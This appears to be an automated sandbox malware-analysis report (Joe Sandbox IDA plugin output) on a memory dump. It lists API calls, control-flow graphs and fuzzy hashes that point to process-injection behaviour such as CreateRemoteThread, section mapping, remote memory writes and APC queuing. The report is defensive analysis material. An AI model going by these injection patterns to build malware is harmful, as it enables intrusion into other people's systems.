                            • Source File: 00000022.00000002.1120092798.0000000000DA1000.00000020.80000000.00040000.00000000.sdmp, Offset: 00DA1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_34_2_da1000_control.jbxd
                            Similarity
                            • API ID:
                            • String ID: @
                            • API String ID: 0-2766056989
                            • Opcode ID: 3eca525cd128f1419d277dafea458dc829a131b9efbb4a20cf129a08f58ee42c
                            • Instruction ID: e70b741db038b68bd0654b90e51795f8c68a0cd2343dbae58672f161bf5c662b
                            • Opcode Fuzzy Hash: 3eca525cd128f1419d277dafea458dc829a131b9efbb4a20cf129a08f58ee42c
                            • Instruction Fuzzy Hash: AA12A430618F498FDB68EF2CD895A66B3E1FB99311F54462EE44AC3251EF34E841CB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000022.00000002.1120092798.0000000000DA1000.00000020.80000000.00040000.00000000.sdmp, Offset: 00DA1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_34_2_da1000_control.jbxd
                            Similarity
                            • API ID: InformationQueryToken$Close
                            • String ID: 0
                            • API String ID: 459398573-4108050209
                            • Opcode ID: 1d329fb9e0d882055965528541753bd1d632a96cf17403ec62c6e1096f290a42
                            • Instruction ID: 7e9b14009272692dfb89fac6462ff374c2c8d3210d6d2265216c8f5c812a6ab6
                            • Opcode Fuzzy Hash: 1d329fb9e0d882055965528541753bd1d632a96cf17403ec62c6e1096f290a42
                            • Instruction Fuzzy Hash: 2F313730218B488FD764EF28D884B9AB7E1FB99301F50492EE48AC3250DB349945CB92
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                            • NtSetInformationProcess.NTDLL ref: 00DAAB14
                            • CreateRemoteThread.KERNELBASE ref: 00DAABBA
                            • FindCloseChangeNotification.KERNELBASE ref: 00DAAC0C
                            Memory Dump Source
                            • Source File: 00000022.00000002.1120092798.0000000000DA1000.00000020.80000000.00040000.00000000.sdmp, Offset: 00DA1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_34_2_da1000_control.jbxd
                            Similarity
                            • API ID: ChangeCloseCreateFindInformationNotificationProcessRemoteThread
                            • String ID:
                            • API String ID: 1964589409-0
                            • Opcode ID: dd0c2b130d36feadd4af54306e709c2e104e3e661f7d0464bc00cc3c0d7906f7
                            • Instruction ID: 2b1f993e91fb6c97cb1a3e3dd4a3ed8215be99e0922edc38566d9a9ff5d1fe01
                            • Opcode Fuzzy Hash: dd0c2b130d36feadd4af54306e709c2e104e3e661f7d0464bc00cc3c0d7906f7
                            • Instruction Fuzzy Hash: E051B030618F098FE764EF6CD88962677E1FB99311F14462DE94AC3261EB34DC45CBA2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                            • CreateMutexExA.KERNEL32 ref: 00DAEFC5
                            • GetUserNameA.ADVAPI32 ref: 00DAF1FE
                              • Part of subcall function 00DC26BC: CreateThread.KERNELBASE ref: 00DC26EC
                              • Part of subcall function 00DC26BC: QueueUserAPC.KERNELBASE ref: 00DC2703
                            Memory Dump Source
                            • Source File: 00000022.00000002.1120092798.0000000000DA1000.00000020.80000000.00040000.00000000.sdmp, Offset: 00DA1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_34_2_da1000_control.jbxd
                            Similarity
                            • API ID: CreateUser$MutexNameQueueThread
                            • String ID:
                            • API String ID: 2503873790-0
                            • Opcode ID: 65416d51ddc368e46638aa6b834957fa1499cd6a752d9d41a9b0e699f5c12d94
                            • Instruction ID: 1e4c1286a780c144af1ef9429ca987bf144637903b1c5b9480dd2ad997933eeb
                            • Opcode Fuzzy Hash: 65416d51ddc368e46638aa6b834957fa1499cd6a752d9d41a9b0e699f5c12d94
                            • Instruction Fuzzy Hash: 0E72F374619B088FE738EF68EC8566673E1F759300B24856ED48BC3261DE38E947CB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 597 db583c-db587e 599 db5a4f 597->599 600 db5884-db58c7 597->600 601 db5a54-db5a77 599->601 604 db5a3b-db5a4d 600->604 605 db58cd-db58ec 600->605 604->601 605->604 608 db58f2-db5911 605->608 608->604 610 db5917-db5936 608->610 610->604 612 db593c-db595b 610->612 612->604 614 db5961-db59e3 call dae53c NtCreateSection 612->614 617 db5a2a-db5a2f 614->617 618 db59e5-db5a02 call db41d8 614->618 624 db5a31-db5a33 617->624 622 db5a20-db5a28 618->622 623 db5a04-db5a1e call dae53c 618->623 622->624 623->624 624->604 625 db5a35-db5a39 624->625 625->601
                            APIs
                            • NtCreateSection.NTDLL ref: 00DB59DE
                              • Part of subcall function 00DB41D8: NtMapViewOfSection.NTDLL ref: 00DB4224
                            Strings
                            Memory Dump Source
                            • Source File: 00000022.00000002.1120092798.0000000000DA1000.00000020.80000000.00040000.00000000.sdmp, Offset: 00DA1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_34_2_da1000_control.jbxd
                            Similarity
                            • API ID: Section$CreateView
                            • String ID: 0
                            • API String ID: 1585966358-4108050209
                            • Opcode ID: ddee7626615230fcf7c395749575c7ba4c8475b06737a6c62266c65c6789a215
                            • Instruction ID: 16237a31bcec2f6b6a8ca359729edd54665c7e27f8ffa270825499f24b425efa
                            • Opcode Fuzzy Hash: ddee7626615230fcf7c395749575c7ba4c8475b06737a6c62266c65c6789a215
                            • Instruction Fuzzy Hash: 5F61D370208F098FDB54EF18E8C9AA577E1FB99305F10466EE84AC7265DB34E941CB82
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            control_flow_graph 629 dc04cc-dc04e0 630 dc0526-dc052e 629->630 631 dc04e2-dc050d NtAllocateVirtualMemory 629->631 632 dc050f-dc051f 631->632 633 dc0521-dc0522 631->633 632->630 633->630
                            APIs
                            • NtAllocateVirtualMemory.NTDLL ref: 00DC0509
                            Strings
                            Memory Dump Source
                            • Source File: 00000022.00000002.1120092798.0000000000DA1000.00000020.80000000.00040000.00000000.sdmp, Offset: 00DA1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_34_2_da1000_control.jbxd
                            Similarity
                            • API ID: AllocateMemoryVirtual
                            • String ID: @
                            • API String ID: 2167126740-2766056989
                            • Opcode ID: 4a635f0baf7352d585f4b9955f8ef4a3d1a48b6d8d42aa917975d814b7700276
                            • Instruction ID: 0e83a7405326285f8179994387ce3b2e2c25854c2f480c5db91e480d3f493a1d
                            • Opcode Fuzzy Hash: 4a635f0baf7352d585f4b9955f8ef4a3d1a48b6d8d42aa917975d814b7700276
                            • Instruction Fuzzy Hash: 21F09070614A058BDB449FA8D8CCA7E7AE0FB5C301F40096DE10ACB294DB78C9048B45
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            control_flow_graph 636 ddf00c-ddf063 639 ddf33d-ddf355 636->639 640 ddf069-ddf082 636->640 647 ddf358-ddf36a 639->647 641 ddf088-ddf091 640->641 642 ddf237-ddf282 NtProtectVirtualMemory 640->642 641->642 646 ddf097-ddf09f 641->646 644 ddf31c-ddf31e 642->644 645 ddf288-ddf289 642->645 644->647 648 ddf320-ddf33b 644->648 649 ddf28d-ddf28f 645->649 650 ddf0a2-ddf0ae 646->650 648->647 649->647 653 ddf295-ddf299 649->653 651 ddf0cc-ddf0fa 650->651 652 ddf0b0-ddf0b1 650->652 663 ddf228-ddf229 651->663 664 ddf100-ddf111 651->664 654 ddf0b3-ddf0ca 652->654 656 ddf29b-ddf2af 653->656 657 ddf2b1-ddf2b5 653->657 654->651 654->654 658 ddf2d0-ddf316 NtProtectVirtualMemory 656->658 659 ddf2cd-ddf2ce 657->659 660 ddf2b7-ddf2cb 657->660 658->644 658->649 659->658 660->658 667 ddf22e-ddf231 663->667 665 ddf11e-ddf13a 664->665 666 ddf113-ddf118 664->666 669 ddf20c-ddf220 665->669 670 ddf140-ddf17e 665->670 666->665 668 ddf204-ddf205 666->668 667->642 667->647 668->669 669->650 671 ddf226 669->671 674 ddf1a7-ddf1c3 670->674 675 ddf180-ddf188 670->675 671->667 679 ddf1c8-ddf1ca 674->679 680 ddf1c5 674->680 676 ddf18a-ddf191 675->676 677 ddf193-ddf1a4 675->677 676->676 676->677 677->674 681 ddf1cc-ddf1ee 679->681 682 ddf1fe-ddf1ff 679->682 680->679 681->669 683 ddf1f0-ddf1f9 681->683 682->668 683->670
                            APIs
                            • NtProtectVirtualMemory.NTDLL ref: 00DDF27A
                            • NtProtectVirtualMemory.NTDLL ref: 00DDF309
                            Memory Dump Source
                            • Source File: 00000022.00000002.1120165643.0000000000DDF000.00000040.80000000.00040000.00000000.sdmp, Offset: 00DDF000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_34_2_ddf000_control.jbxd
                            Similarity
                            • API ID: MemoryProtectVirtual
                            • String ID:
                            • API String ID: 2706961497-0
                            • Opcode ID: a59e7330c344a8924aadb8df579730d348d62e2dd0b3f31548d4106938de021f
                            • Instruction ID: aa614a0ef0fbcd30f7ee3a9552a1ee4b839fd250506ea6a1bf05964f292214a2
                            • Opcode Fuzzy Hash: a59e7330c344a8924aadb8df579730d348d62e2dd0b3f31548d4106938de021f
                            • Instruction Fuzzy Hash: 3DA1F33120CB888FC725DF28DC816A9B7E1FB96310F58497ED0CBC7352D634A94A8796
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000022.00000002.1120092798.0000000000DA1000.00000020.80000000.00040000.00000000.sdmp, Offset: 00DA1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_34_2_da1000_control.jbxd
                            Similarity
                            • API ID: CreateHeap
                            • String ID:
                            • API String ID: 10892065-0
                            • Opcode ID: f2e9bff578f9a15bce2ef6bf4145e31af0cb62274452ec41cbe60190f951919a
                            • Instruction ID: 1681782515b80ee081e97b63b9d4cf0e2df712a01654682bc66d9d81b33c4e65
                            • Opcode Fuzzy Hash: f2e9bff578f9a15bce2ef6bf4145e31af0cb62274452ec41cbe60190f951919a
                            • Instruction Fuzzy Hash: 3C81A730618B098FE768EF28D89976637E5FB99311F24452ED44BC3262EF78D8438751
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • NtProtectVirtualMemory.NTDLL ref: 00DDF309
                            Memory Dump Source
                            • Source File: 00000022.00000002.1120165643.0000000000DDF000.00000040.80000000.00040000.00000000.sdmp, Offset: 00DDF000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_34_2_ddf000_control.jbxd
                            Similarity
                            • API ID: MemoryProtectVirtual
                            • String ID:
                            • API String ID: 2706961497-0
                            • Opcode ID: ace8e25785d53be990e295b6630041c346870120cbdade4e215488f30dd9fa8c
                            • Instruction ID: 1ddbabc70d29607ec308d09ff18ab7b2f6d07c0a2346f81f44102b821c98f7cb
                            • Opcode Fuzzy Hash: ace8e25785d53be990e295b6630041c346870120cbdade4e215488f30dd9fa8c
                            • Instruction Fuzzy Hash: 765156B158E7D24FE3034B389CA25967FB0EE1361471A44EBC4D2CF2A3D218985BC762
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • NtQueryInformationProcess.NTDLL ref: 00DCA16E
                            Memory Dump Source
                            • Source File: 00000022.00000002.1120092798.0000000000DA1000.00000020.80000000.00040000.00000000.sdmp, Offset: 00DA1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_34_2_da1000_control.jbxd
                            Similarity
                            • API ID: InformationProcessQuery
                            • String ID:
                            • API String ID: 1778838933-0
                            • Opcode ID: dfb0bd0d955acea561495a2b9a6a1e46d5472ef252c8a6bc1bd17e1be8bc3492
                            • Instruction ID: d75499b2061df835f63edfbebcb5a6300475434f2b5d694c72faaee89a1086c3
                            • Opcode Fuzzy Hash: dfb0bd0d955acea561495a2b9a6a1e46d5472ef252c8a6bc1bd17e1be8bc3492
                            • Instruction Fuzzy Hash: 6F016D30318E4E8F9B84EF6CD5C4B25B3E4FBA8309B58016EA40AC7124D634D881CB12
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000022.00000002.1120092798.0000000000DA1000.00000020.80000000.00040000.00000000.sdmp, Offset: 00DA1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_34_2_da1000_control.jbxd
                            Similarity
                            • API ID: SectionView
                            • String ID:
                            • API String ID: 1323581903-0
                            • Opcode ID: fcd82b1f9bd2768ab02ed58a59795749d2e6ecb94e6dd7f1d9f4b656cf451d04
                            • Instruction ID: 9c92c7206e8fd4cd4e729b00bf6851ba04d4ce0debe37c602e59e3a337323a1a
                            • Opcode Fuzzy Hash: fcd82b1f9bd2768ab02ed58a59795749d2e6ecb94e6dd7f1d9f4b656cf451d04
                            • Instruction Fuzzy Hash: A401D670A08B048FCB44DF69D0C8569BBE1FB58311B50066FE949CB796DB70D885CB45
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000022.00000002.1120092798.0000000000DA1000.00000020.80000000.00040000.00000000.sdmp, Offset: 00DA1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_34_2_da1000_control.jbxd
                            Similarity
                            • API ID: MemoryReadVirtual
                            • String ID:
                            • API String ID: 2834387570-0
                            • Opcode ID: ffe9d94baff124fbd0c0dae0ab1b7fff43dad1889fc04521d7e790575ae50dc4
                            • Instruction ID: fbb0f1115aee5ded89a5be42495bddb96d40057be39ead497f6e890283d4a53d
                            • Opcode Fuzzy Hash: ffe9d94baff124fbd0c0dae0ab1b7fff43dad1889fc04521d7e790575ae50dc4
                            • Instruction Fuzzy Hash: C1E0DF34715B808BEB00ABB88CCA63D33D4FBDA305F200839E941C7320C66EC8909312
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • NtWriteVirtualMemory.NTDLL ref: 00DA6D43
                            Memory Dump Source
                            • Source File: 00000022.00000002.1120092798.0000000000DA1000.00000020.80000000.00040000.00000000.sdmp, Offset: 00DA1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_34_2_da1000_control.jbxd
                            Similarity
                            • API ID: MemoryVirtualWrite
                            • String ID:
                            • API String ID: 3527976591-0
                            • Opcode ID: d23d61faf8d6dfe27aa2c22a3f5bc1c750ef00163c72f4a258adb9736be49e33
                            • Instruction ID: 7d572583fa5ed50d11620b63d42b0b05fc78d9c72f6a7399c1964f371d252034
                            • Opcode Fuzzy Hash: d23d61faf8d6dfe27aa2c22a3f5bc1c750ef00163c72f4a258adb9736be49e33
                            • Instruction Fuzzy Hash: 97E04F74B25A448BEF14AFB888C923973D1F789305F24083AEA55C7364DA69C8869752
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            control_flow_graph 144 daeca8-daed1b call dae53c call da495c 149 daed1d-daed3d call da9660 144->149 150 daed43-daed4e 144->150 149->150 157 daeec7-daeecb 149->157 152 daed5e-daed80 call da40c0 150->152 153 daed50-daed5c call dab11c 150->153 162 daeebf-daeec5 152->162 163 daed86-daed8c 152->163 153->152 160 daeecd-daeece 157->160 161 daeed7-daeef4 157->161 160->161 162->157 164 daeeb8-daeebd 163->164 165 daed92-daedb7 VirtualProtectEx 163->165 164->157 167 daedb9-daedd1 call da4a48 165->167 168 daedd3 165->168 170 daedd5-daedd7 167->170 168->170 170->162 172 daeddd-daede3 170->172 173 daede8-daee22 ResumeThread SuspendThread 172->173 175 daee37-daee39 173->175 176 daee24-daee2f 173->176 177 daee3b-daee43 175->177 178 daee45-daee4d 175->178 176->175 177->173 177->178 180 daee4f-daee54 178->180 181 daee56-daee6d call da9660 178->181 182 daee6f-daee9c VirtualProtectEx 180->182 181->182 182->157 185 daee9e-daeeb6 call da4a48 182->185 185->157
                            APIs
                              • Part of subcall function 00DA495C: FindCloseChangeNotification.KERNELBASE ref: 00DA4A08
                            • VirtualProtectEx.KERNELBASE ref: 00DAEDAF
                            • ResumeThread.KERNELBASE ref: 00DAEDEC
                            • SuspendThread.KERNELBASE ref: 00DAEE0F
                            • VirtualProtectEx.KERNELBASE ref: 00DAEE8C
                              • Part of subcall function 00DA4A48: VirtualProtectEx.KERNELBASE ref: 00DA4A9C
                            Memory Dump Source
                            • Source File: 00000022.00000002.1120092798.0000000000DA1000.00000020.80000000.00040000.00000000.sdmp, Offset: 00DA1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_34_2_da1000_control.jbxd
                            Similarity
                            • API ID: ProtectVirtual$Thread$ChangeCloseFindNotificationResumeSuspend
                            • String ID:
                            • API String ID: 4107391026-0
                            • Opcode ID: 402ce7ab850c0aaf866a792033b954b0627cae8d5c5966339e0a1a97b78aa575
                            • Instruction ID: a9567da0230d8097c4e56173b6f18f20f1e5a7477fc80c7c87a8b5f6e3a87f5c
                            • Opcode Fuzzy Hash: 402ce7ab850c0aaf866a792033b954b0627cae8d5c5966339e0a1a97b78aa575
                            • Instruction Fuzzy Hash: 9C61B130708A084BD768EB28E8857AA73D1FB99311F14052DE58EC3281DF34D946CB96
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            control_flow_graph 228 da25c0-da25ea call dcc930 231 da25f0-da2607 call dc887c 228->231 232 da2705-da271c 228->232 235 da260d-da2622 231->235 236 da26f1-da26fd 231->236 237 da2626-da262a 235->237 236->232 238 da2648-da2655 237->238 239 da262c-da2646 237->239 238->236 241 da265b 238->241 239->238 240 da265d-da2668 239->240 240->236 242 da266e-da26a1 CreateFileA 240->242 241->237 242->236 243 da26a3-da26b6 SetFilePointer 242->243 244 da26e8-da26eb FindCloseChangeNotification 243->244 245 da26b8-da26d8 ReadFile 243->245 244->236 245->244 246 da26da-da26df 245->246 246->244 247 da26e1-da26e6 246->247 247->244
                            APIs
                            • CreateFileA.KERNELBASE ref: 00DA2694
                            • SetFilePointer.KERNELBASE ref: 00DA26AE
                            • ReadFile.KERNELBASE ref: 00DA26D0
                            • FindCloseChangeNotification.KERNELBASE ref: 00DA26EB
                            Memory Dump Source
                            • Source File: 00000022.00000002.1120092798.0000000000DA1000.00000020.80000000.00040000.00000000.sdmp, Offset: 00DA1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_34_2_da1000_control.jbxd
                            Similarity
                            • API ID: File$ChangeCloseCreateFindNotificationPointerRead
                            • String ID:
                            • API String ID: 2405668454-0
                            • Opcode ID: 15c46c7971568a1e5738af9ca929169a9ceca98acae8aacbac5953522a212d00
                            • Instruction ID: 90ba9f6bb6d9ddb01a6c1ff1a5ef2e0b78766288a061df03a27b7143778548e0
                            • Opcode Fuzzy Hash: 15c46c7971568a1e5738af9ca929169a9ceca98acae8aacbac5953522a212d00
                            • Instruction Fuzzy Hash: 2641C730219A084FDB58DF2DD8C4B3573E1FB99315B28466EE09AC3261DE35D8438B51
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            control_flow_graph 248 da1930-da1982 250 da1988-da198b 248->250 251 da1b19 248->251 253 da198d-da1993 250->253 252 da1b1e-da1b34 251->252 254 da19e0-da19e2 253->254 255 da1995-da1998 253->255 256 da19eb-da19ee 254->256 257 da19e4-da19e9 254->257 258 da199a-da199d 255->258 259 da19c6-da19c8 255->259 262 da1b00 256->262 263 da19f4-da1a16 256->263 257->256 258->259 264 da199f-da19a1 258->264 260 da19ca-da19d1 259->260 261 da19d3-da19d4 259->261 260->261 265 da19d7-da19de 261->265 268 da1b05-da1b17 RtlDeleteBoundaryDescriptor 262->268 271 da1af9-da1afe 263->271 272 da1a1c-da1a29 263->272 266 da19c2-da19c4 264->266 267 da19a3-da19a6 264->267 265->253 265->254 266->265 267->256 270 da19a8-da19b3 267->270 268->252 273 da19b8-da19bf 270->273 274 da19b5 270->274 271->268 275 da1a2f-da1a35 272->275 276 da1aec-da1af7 272->276 273->266 274->273 277 da1a37-da1a8b 275->277 276->268 280 da1a8d-da1a8e 277->280 281 da1ac3-da1ae1 277->281 282 da1a90-da1a9f lstrcmp 280->282 281->277 288 da1ae7-da1ae8 281->288 283 da1abc 282->283 284 da1aa1-da1ab8 282->284 287 da1abe-da1abf 283->287 284->282 286 da1aba 284->286 286->287 287->281 288->276
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000022.00000002.1120092798.0000000000DA1000.00000020.80000000.00040000.00000000.sdmp, Offset: 00DA1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_34_2_da1000_control.jbxd
                            Similarity
                            • API ID: BoundaryDeleteDescriptorlstrcmp
                            • String ID:
                            • API String ID: 735288309-3916222277
                            • Opcode ID: e550695b4b61958b2117182ed079959755ec0d1867ab0c412c5e6705c87392a7
                            • Instruction ID: 0f6999062da27aae1213a4635156323f628eb9c37e78963e47288da7153bf8bd
                            • Opcode Fuzzy Hash: e550695b4b61958b2117182ed079959755ec0d1867ab0c412c5e6705c87392a7
                            • Instruction Fuzzy Hash: 0A517A3561CA584FD72CAE5CDC8627A73D5F78A311F28013ED9DAC3251DA209C538BD2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            control_flow_graph 289 dbd43c-dbd483 call dc7004 292 dbd489-dbd4ba RegQueryValueExA 289->292 293 dbd522-dbd529 289->293 294 dbd4bc-dbd4c1 292->294 295 dbd4c3-dbd4cc call dc772c 292->295 296 dbd52b-dbd533 293->296 297 dbd55d-dbd565 293->297 294->295 302 dbd4d1-dbd4e0 294->302 295->302 298 dbd553 296->298 299 dbd535-dbd551 call db9684 296->299 300 dbd567-dbd580 297->300 301 dbd5d5-dbd5e4 297->301 298->297 299->297 299->298 309 dbd5ce-dbd5cf 300->309 310 dbd582-dbd5c4 300->310 305 dbd4e2-dbd515 302->305 306 dbd517-dbd518 302->306 305->306 306->293 309->301 310->309
                            APIs
                              • Part of subcall function 00DC7004: RegCreateKeyA.ADVAPI32(?,?,?,00DC9153), ref: 00DC7027
                            • RegQueryValueExA.KERNELBASE ref: 00DBD4B0
                            Strings
                            Memory Dump Source
                            • Source File: 00000022.00000002.1120092798.0000000000DA1000.00000020.80000000.00040000.00000000.sdmp, Offset: 00DA1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_34_2_da1000_control.jbxd
                            Similarity
                            • API ID: CreateQueryValue
                            • String ID: ($(
                            • API String ID: 2711935003-222463766
                            • Opcode ID: 7039fa200ef29c184f5b10477ca8e5680abadd57b94e265f504d8aab6c8d6b78
                            • Instruction ID: 32b54264d6560cf825db36f1fef0039b338603f5b7b1e4dfabd7997d77faec15
                            • Opcode Fuzzy Hash: 7039fa200ef29c184f5b10477ca8e5680abadd57b94e265f504d8aab6c8d6b78
                            • Instruction Fuzzy Hash: 2041B670618748CFE744EF18E8986A677E5F799309F04C52DD48AC3260EF78DA45CB52
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            control_flow_graph 312 dab7c0-dab811 RegQueryValueExA 313 dab819-dab831 RtlAllocateHeap 312->313 314 dab813-dab817 312->314 316 dab86a-dab891 RegQueryValueExA 313->316 317 dab833 313->317 315 dab84d-dab869 314->315 318 dab836-dab839 316->318 319 dab893-dab89d 316->319 317->318 318->315 320 dab83b-dab845 318->320 319->315 320->315
                            APIs
                            • RegQueryValueExA.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,-0000001F), ref: 00DAB803
                            • RtlAllocateHeap.NTDLL ref: 00DAB825
                            • RegQueryValueExA.KERNELBASE ref: 00DAB887
                            Memory Dump Source
                            • Source File: 00000022.00000002.1120092798.0000000000DA1000.00000020.80000000.00040000.00000000.sdmp, Offset: 00DA1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_34_2_da1000_control.jbxd
                            Similarity
                            • API ID: QueryValue$AllocateHeap
                            • String ID:
                            • API String ID: 2311914766-0
                            • Opcode ID: ef6809351d6a3fd0382751fac07e276fa1a4ebb1ea0e019a2a018e57f3e20f07
                            • Instruction ID: 9b2f0646a031744ee950da3916f2354ac4fba0952891bd54c9730ee943f1939b
                            • Opcode Fuzzy Hash: ef6809351d6a3fd0382751fac07e276fa1a4ebb1ea0e019a2a018e57f3e20f07
                            • Instruction Fuzzy Hash: 8C31B43161CB088FEB58EF18D489666B3E0FBA8311F11452EE849C3256DF34DC428B82
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            control_flow_graph 545 dce2c4-dce341 546 dce368-dce394 545->546 547 dce343-dce363 545->547 548 dce3aa-dce3ae 546->548 549 dce396-dce3a8 546->549 554 dce59a-dce5b1 547->554 550 dce3b2-dce3be 548->550 549->550 552 dce3dc-dce3df 550->552 553 dce3c0-dce3cf 550->553 555 dce3e5-dce3e8 552->555 556 dce4b3-dce4bb 552->556 564 dce3d5-dce3d6 553->564 565 dce570-dce57a 553->565 560 dce3fc-dce40d LoadLibraryA 555->560 561 dce3ea-dce3fa 555->561 557 dce4cc-dce4cf 556->557 558 dce4bd-dce4ca 556->558 562 dce56c-dce56d 557->562 563 dce4d5-dce4d8 557->563 558->557 566 dce40f-dce423 560->566 567 dce467-dce471 560->567 561->560 561->567 562->565 569 dce4da-dce4dd 563->569 570 dce503-dce517 563->570 564->552 573 dce57c-dce591 565->573 574 dce597-dce598 565->574 580 dce425-dce435 566->580 581 dce437-dce462 566->581 571 dce4a3-dce4a4 567->571 572 dce473-dce477 567->572 569->570 576 dce4df-dce4ea 569->576 570->562 586 dce519-dce52d 570->586 577 dce4ac-dce4ad 571->577 572->577 578 dce479-dce48a 572->578 573->574 574->554 576->570 582 dce4ec-dce4f1 576->582 577->556 578->577 590 dce48c-dce4a1 578->590 580->567 580->581 581->554 582->570 584 dce4f3-dce4f8 582->584 584->570 589 dce4fa-dce501 584->589 592 dce53c-dce53f 586->592 593 dce52f-dce53a 586->593 589->562 589->570 590->577 592->562 594 dce541-dce568 592->594 593->592 594->562
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000022.00000002.1120092798.0000000000DA1000.00000020.80000000.00040000.00000000.sdmp, Offset: 00DA1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_34_2_da1000_control.jbxd
                            Similarity
                            • API ID: LibraryLoad
                            • String ID: H
                            • API String ID: 1029625771-2852464175
                            • Opcode ID: 6cc38ccaa850b681befee8090efae8b1f89e5c4c5265d701e1b2086e5fd9da55
                            • Instruction ID: 19c4a2cd3721d0e374bbeb9448a84f962fe0103819be38d8ec8ecf7fc0fa9755
                            • Opcode Fuzzy Hash: 6cc38ccaa850b681befee8090efae8b1f89e5c4c5265d701e1b2086e5fd9da55
                            • Instruction Fuzzy Hash: 6AA1B170518F0A8FEB55EF58D888BA673E1FB98315F04062ED88AC3261EF34D841CB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            control_flow_graph 684 da1b38-da1b80 call dc887c 687 da1d09-da1d0e 684->687 688 da1b86-da1b9f call dc7340 684->688 689 da1d12-da1d32 687->689 693 da1cff-da1d07 688->693 694 da1ba5-da1bd6 call db0af0 688->694 693->689 694->689 698 da1bdc-da1be4 694->698 699 da1c5f-da1c8e VirtualProtect 698->699 700 da1be6-da1beb 698->700 702 da1c9d-da1cf5 call dca148 699->702 703 da1c90-da1c98 call dafd58 699->703 700->699 701 da1bed-da1bff call da634c 700->701 701->699 708 da1c01-da1c19 call dc7340 701->708 702->689 715 da1cf7-da1cfd 702->715 703->702 708->699 714 da1c1b-da1c59 VirtualProtect 708->714 714->699 715->689
                            APIs
                              • Part of subcall function 00DC7340: VirtualProtect.KERNELBASE ref: 00DC7373
                            • VirtualProtect.KERNELBASE ref: 00DA1C59
                            • VirtualProtect.KERNELBASE ref: 00DA1C7C
                            Memory Dump Source
                            • Source File: 00000022.00000002.1120092798.0000000000DA1000.00000020.80000000.00040000.00000000.sdmp, Offset: 00DA1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_34_2_da1000_control.jbxd
                            Similarity
                            • API ID: ProtectVirtual
                            • String ID:
                            • API String ID: 544645111-0
                            • Opcode ID: 82c18c6e6fa7bbc15f18fe96c22df7e925fd8627ec72f289340420d94a56c73c
                            • Instruction ID: b169e1fe7311eb167ee845b122632741dbad34b07fb4cb53163d48e48d155bb7
                            • Opcode Fuzzy Hash: 82c18c6e6fa7bbc15f18fe96c22df7e925fd8627ec72f289340420d94a56c73c
                            • Instruction Fuzzy Hash: 60516C70618F098FDB44EF29D889B25B7E5FB98311F14056EE84AC7261EB34E941CB92
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

